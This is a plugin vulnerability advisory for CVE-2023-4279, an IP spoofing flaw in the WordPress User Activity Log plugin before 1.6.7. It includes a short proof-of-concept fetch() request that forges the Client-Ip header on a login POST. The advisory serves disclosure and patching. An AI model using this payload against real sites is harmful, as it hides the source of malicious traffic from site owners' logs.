User Activity Log < 1.6.7 – IP Spoofing | CVE 2023-4279 | Plugin Vulnerabilities

Description

This plugin retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic.

Proof of Concept

1. In User Activity Log > Settings, enable the setting "Allow Ip Address of users to log." and save settings.

2. Run the following code in the web browser and note on the backend that the IP address has been faked.

await fetch("/wp-login.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
    "Client-Ip": "8.8.8.8",
  },
  "body": "log=USERNAME&pwd=PASSWORD",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});

Affects Plugins

user-activity-log

Fixed in 1.6.7

References

CVE

Classification

Type

SPOOFING

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Bartlomiej Marek and Tomasz Swiadek

Submitter

Bartlomiej Marek

Verified

Yes

WPVDB ID

2bd2579e-b383-4d12-b207-6fc32cfb82bc

Timeline

Publicly Published

2023-08-14 (about 2 years ago)

Added

2023-08-14 (about 2 years ago)

Last Updated

2023-08-14 (about 2 years ago)

Other

Published

Title

Published

2024-01-10

Title

WordPress Manutenção < 1.0.7 - IP Spoofing to Maintenance Mode Bypass

Published

2024-01-29

Title

User Activity Tracking and Log < 4.1.4 - IP Spoofing

Published

2024-09-16

Title

Maintenance Redirect < 2.1.0 - IP Spoofing to Maintenance Mode Bypass

Published

2024-04-29

Title

WTI Like Post <= 1.4.6 - IP Spoofing

Published

2024-03-28

Title

CGC Maintenance Mode <= 1.2 - IP Spoofing